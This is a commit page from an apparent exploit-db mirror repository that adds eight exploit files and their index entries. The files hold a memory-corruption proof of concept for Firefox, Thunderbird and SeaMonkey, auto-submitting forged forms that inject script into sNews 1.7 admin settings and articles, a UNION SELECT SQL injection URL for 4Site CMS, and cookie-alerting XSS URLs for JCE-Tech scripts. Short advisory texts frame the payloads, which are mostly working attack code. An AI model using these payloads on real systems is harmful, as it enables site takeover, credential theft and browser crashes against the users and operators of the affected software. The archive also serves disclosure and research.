bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 10_07_2014

Browse source
This commit is contained in:
Offensive Security 2014-10-07 04:45:04 +00:00
parent 63098d36da
commit fd387fea39
9 changed files with 103 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
files.csv
View file

@ -31406,3 +31406,11 @@ id,file,description,date,author,platform,type,port
34876,platforms/php/webapps/34876.txt,"E-Gold Game Series: Pirates of The Caribbean Multiple SQL Injection Vulnerabilities",2009-08-27,Moudi,php,webapps,0 34876,platforms/php/webapps/34876.txt,"E-Gold Game Series: Pirates of The Caribbean Multiple SQL Injection Vulnerabilities",2009-08-27,Moudi,php,webapps,0
34877,platforms/php/webapps/34877.txt,"DigiOz Guestbook 1.7.2 'search.php' Cross Site Scripting Vulnerability",2009-08-26,Moudi,php,webapps,0 34877,platforms/php/webapps/34877.txt,"DigiOz Guestbook 1.7.2 'search.php' Cross Site Scripting Vulnerability",2009-08-26,Moudi,php,webapps,0
34878,platforms/php/webapps/34878.txt,"StandAloneArcade 1.1 'gamelist.php' Cross Site Scripting Vulnerability",2009-08-27,Moudi,php,webapps,0 34878,platforms/php/webapps/34878.txt,"StandAloneArcade 1.1 'gamelist.php' Cross Site Scripting Vulnerability",2009-08-27,Moudi,php,webapps,0
34881,platforms/linux/remote/34881.html,"Mozilla Firefox SeaMonkey <= 3.6.10 and Thunderbird <= 3.1.4 'document.write' Memory Corruption Vulnerability",2010-10-19,"Alexander Miller",linux,remote,0
34882,platforms/php/webapps/34882.html,"sNews 1.7 'snews.php' Cross Site Scripting and HTML Injection Vulnerabilities",2010-10-19,"High-Tech Bridge SA",php,webapps,0
34883,platforms/php/webapps/34883.txt,"4Site CMS 2.6 'cat' Parameter SQL Injection Vulnerability",2010-10-19,"High-Tech Bridge SA",php,webapps,0
34884,platforms/php/webapps/34884.txt,"JCE-Tech SearchFeed Script 'index.php' Cross Site Scripting Vulnerability",2009-08-26,Moudi,php,webapps,0
34885,platforms/php/webapps/34885.txt,"Auction RSS Content Script rss.php id Parameter XSS",2009-08-26,Moudi,php,webapps,0
34886,platforms/php/webapps/34886.txt,"Auction RSS Content Script search.php id Parameter XSS",2009-08-26,Moudi,php,webapps,0
34887,platforms/php/webapps/34887.txt,"JCE-Tech PHP Video Script 'index.php' Cross Site Scripting Vulnerability",2009-08-26,Moudi,php,webapps,0
34888,platforms/php/webapps/34888.html,"sNews 1.7 'snews.php' Cross Site Scripting and HTML Injection Vulnerabilities",2010-10-19,"High-Tech Bridge SA",php,webapps,0

Can't render this file because it is too large.

40
platforms/linux/remote/34881.html Executable file
View file

@ -0,0 +1,40 @@
source: http://www.securityfocus.com/bid/44247/info
Mozilla Firefox, Thunderbird, and Seamonkey are prone to a memory-corruption vulnerability because they fail to adequately validate user-supplied data.
Successful exploits may allow an attacker to execute arbitrary code in the context of the user running an affected application. Failed exploit attempts will result in a denial-of-service condition.
This issue affects versions prior to:
Firefox 3.6.11
Firefox 3.5.14
Thunderbird 3.1.5
Thunderbird 3.0.9
SeaMonkey 2.0.9
NOTE: This issue was previously discussed in 44228 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2010-64/65/66/67/68/69/71/72 Multiple Vulnerabilities) but has been given its own record to better document it.
<html>
<head>
<script language="JavaScript" type="Text/Javascript">
var eip = unescape("%u4141%u4141");
var string2 = unescape("%u0000%u0000");
var finalstring2 = expand(string2, 49000000);
var finaleip = expand(eip, 21000001);
document.write(finalstring2);
document.write(finaleip);
function expand(string, number) {
var i = Math.ceil(Math.log(number) / Math.LN2),
result = string;
do {
result += result;
} while (0 < --i);
return result.slice(0, string.length * number);
}
</script>
</head>
<body>
</body>
</html>
<html><body></body></html>

9
platforms/php/webapps/34882.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/44255/info
sNews is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
sNews 1.7 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/?action=process&task=save_settings" method="post" name="main" > <input type="hidden" name="website_title" value='sNews 1.7"><script>alert(document.cookie)</script>'> <input type="hidden" name="home_sef" value="home"> <input type="hidden" name="website_description" value="sNews CMS"> <input type="hidden" name="website_keywords" value="snews"> <input type="hidden" name="website_email" value="info@mydomain.com"> <input type="hidden" name="contact_subject" value="Contact Form"> <input type="hidden" name="language" value="EN"> <input type="hidden" name="charset" value="UTF-8"> <input type="hidden" name="date_format" value="d.m.Y.+H:i"> <input type="hidden" name="article_limit" value="3"> <input type="hidden" name="rss_limit" value="5"> <input type="hidden" name="display_page" value="0"> <input type="hidden" name="num_categories" value="on"> <input type="hidden" name="file_ext" value="phps,php,txt,inc,htm,html"> <input type="hidden" name="allowed_file" value="php,htm,html,txt,inc,css,js,swf"> <input type="hidden" name="allowed_img" value="gif,jpg,jpeg,png"> <input type="hidden" name="comment_repost_timer" value="20"> <input type="hidden" name="comments_order" value="ASC"> <input type="hidden" name="comment_limit" value="30"> <input type="hidden" name="word_filter_file" value=""> <input type="hidden" name="word_filter_change" value=""> <input type="hidden" name="save" value="Save"> </form> <script> document.main.submit(); </script> <form action="http://www.example.com/?action=process&task=admin_article&id=2" method="post" name="main" > <input type="hidden" name="title" value="article title" /> <input type="hidden" name="seftitle" value="sefurl" /> <input type="hidden" name="text" value='article text"><script>alert(document.cookie)</script>' /> <input type="hidden" name="define_category" value="1" /> <input type="hidden" name="publish_article" value="on" /> <input type="hidden" name="position" value="1" /> <input type="hidden" name="description_meta" value="desc" /> <input type="hidden" name="keywords_meta" value="key" /> <input type="hidden" name="display_title" value="on" /> <input type="hidden" name="display_info" value="on" /> <input type="hidden" name="fposting_day" value="29" /> <input type="hidden" name="fposting_month" value="9" /> <input type="hidden" name="fposting_year" value="2010" /> <input type="hidden" name="fposting_hour" value="16" /> <input type="hidden" name="fposting_minute" value="40" /> <input type="hidden" name="task" value="admin_article" /> <input type="hidden" name="edit_article" value="Edit" /> <input type="hidden" name="article_category" value="1" /> <input type="hidden" name="id" value="2" /> </form> <script> document.main.submit(); </script>

9
platforms/php/webapps/34883.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/44258/info
4Site CMS is prone to an SQL-injection vulnerability.
An attacker can exploit this issue to carry out unauthorized actions on the underlying database which may compromise the application and may aid in further attacks.
4Site CMS 2.6 is vulnerable; other versions may also be affected.
http://www.example.com/catalog/index.shtml?cat=-1+UNION+SELECT+@@version

7
platforms/php/webapps/34884.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/44266/info
JCE-Tech SearchFeed Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/index.php?search="><script>alert(document.cookie);</script>

7
platforms/php/webapps/34885.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/44267/info
JCE-Tech Auction RSS Content Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/rss.php?id="><script>alert(document.cookie);</script>

7
platforms/php/webapps/34886.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/44267/info
JCE-Tech Auction RSS Content Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/search.php?id="><script>alert(document.cookie);</script>

7
platforms/php/webapps/34887.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/44269/info
JCE-Tech PHP Video Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/index.php?key="><script>alert(document.cookie);</script>

9
platforms/php/webapps/34888.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/44255/info
sNews is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
sNews 1.7 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/?action=process&task=save_settings" method="post" name="main" > <input type="hidden" name="website_title" value='sNews 1.7"><script>alert(document.cookie)</script>'> <input type="hidden" name="home_sef" value="home"> <input type="hidden" name="website_description" value="sNews CMS"> <input type="hidden" name="website_keywords" value="snews"> <input type="hidden" name="website_email" value="info@mydomain.com"> <input type="hidden" name="contact_subject" value="Contact Form"> <input type="hidden" name="language" value="EN"> <input type="hidden" name="charset" value="UTF-8"> <input type="hidden" name="date_format" value="d.m.Y.+H:i"> <input type="hidden" name="article_limit" value="3"> <input type="hidden" name="rss_limit" value="5"> <input type="hidden" name="display_page" value="0"> <input type="hidden" name="num_categories" value="on"> <input type="hidden" name="file_ext" value="phps,php,txt,inc,htm,html"> <input type="hidden" name="allowed_file" value="php,htm,html,txt,inc,css,js,swf"> <input type="hidden" name="allowed_img" value="gif,jpg,jpeg,png"> <input type="hidden" name="comment_repost_timer" value="20"> <input type="hidden" name="comments_order" value="ASC"> <input type="hidden" name="comment_limit" value="30"> <input type="hidden" name="word_filter_file" value=""> <input type="hidden" name="word_filter_change" value=""> <input type="hidden" name="save" value="Save"> </form> <script> document.main.submit(); </script> <form action="http://www.example.com/?action=process&task=admin_article&id=2" method="post" name="main" > <input type="hidden" name="title" value="article title" /> <input type="hidden" name="seftitle" value="sefurl" /> <input type="hidden" name="text" value='article text"><script>alert(document.cookie)</script>' /> <input type="hidden" name="define_category" value="1" /> <input type="hidden" name="publish_article" value="on" /> <input type="hidden" name="position" value="1" /> <input type="hidden" name="description_meta" value="desc" /> <input type="hidden" name="keywords_meta" value="key" /> <input type="hidden" name="display_title" value="on" /> <input type="hidden" name="display_info" value="on" /> <input type="hidden" name="fposting_day" value="29" /> <input type="hidden" name="fposting_month" value="9" /> <input type="hidden" name="fposting_year" value="2010" /> <input type="hidden" name="fposting_hour" value="16" /> <input type="hidden" name="fposting_minute" value="40" /> <input type="hidden" name="task" value="admin_article" /> <input type="hidden" name="edit_article" value="Edit" /> <input type="hidden" name="article_category" value="1" /> <input type="hidden" name="id" value="2" /> </form> <script> document.main.submit(); </script>